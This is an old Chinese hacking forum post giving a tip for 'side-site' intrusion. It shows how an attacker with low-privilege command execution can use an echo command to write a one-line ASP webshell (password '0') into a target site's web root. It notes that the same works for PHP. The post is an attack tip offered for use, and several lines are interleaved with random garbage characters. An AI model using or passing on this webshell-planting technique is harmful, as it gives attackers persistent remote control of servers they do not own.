在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。+ ~" a, l% ?$ x9 N. B* k) n
, G3 u" V, E/ A! v# z) L/ Z
命令格式
2 H' q& Q* s- H
# U! h; \2 h# z, G6 } N' QEcho 语句 >目标站绝对目录
% l& K e0 ]3 O1 y& m
& `' ~! D. ~. o8 a2 z( L0 e例如: . w1 D8 X8 |, I$ d2 z2 N
5 v3 c" C, B' s& m, Techo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
; d9 \' e1 Q: n# D( w1 j8 b2 y
" S, p6 c6 {2 C" v这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。. ?: k9 v' b3 X0 Z& S. U
|
发表于 2012-9-23 14:40:24
收藏
支持
反对